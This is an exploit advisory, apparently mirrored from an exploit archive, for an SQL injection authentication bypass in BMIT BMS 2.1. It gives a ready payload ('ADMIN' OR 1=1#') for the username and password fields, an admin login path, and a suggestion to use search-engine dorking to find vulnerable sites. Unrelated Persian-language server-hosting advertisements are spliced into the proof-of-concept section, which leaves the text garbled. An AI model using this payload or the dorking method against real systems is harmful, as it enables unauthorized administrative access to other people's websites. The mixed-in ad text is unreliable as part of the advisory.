BMIT BMS 2.1 SQL Injection

BMIT BMS 2.1 SQL Injection
Posted Jul 27, 2023
Authored by indoushka
BMIT BMS version 2.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
tags | exploit, remote, sql injection
SHA-256 | 6c44b20654cc1ac0bd5815441e8f32129376fb466e937a80b8c808e94f6eee08
====================================================================================================================================
| # Title : BMIT BMS 2.1 Auth BY Pass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | 
| # Vendor : https://www.bmitsolution.in/softtware_development.php | 
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

سرور شما نیاز به مدیریت و پشتیبانی دارد؟h3>

پیکربندی، مانیتورینگ و نگهداری حرفه‌ای سرورهای لینوکسی و ویندوزی.

پردازش داده و زیرساخت نیاز دارید؟

راه‌اندازی و مدیریت زیرساخت‌های داده و سرور.

مشاوره زیرساخت
مدیریت سرور

[+] use payload : user & pass : ADMIN’ OR 1=1#

[+] http://127.0.0.1/wwrbsgroupofinstitutioncom/admin/index.php

Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================

 

نیاز به سرور پایدار دارید؟

ارائه VPS ایران و خارج با منابع اختصاصی.

خرید VPS

نوشته های مشابه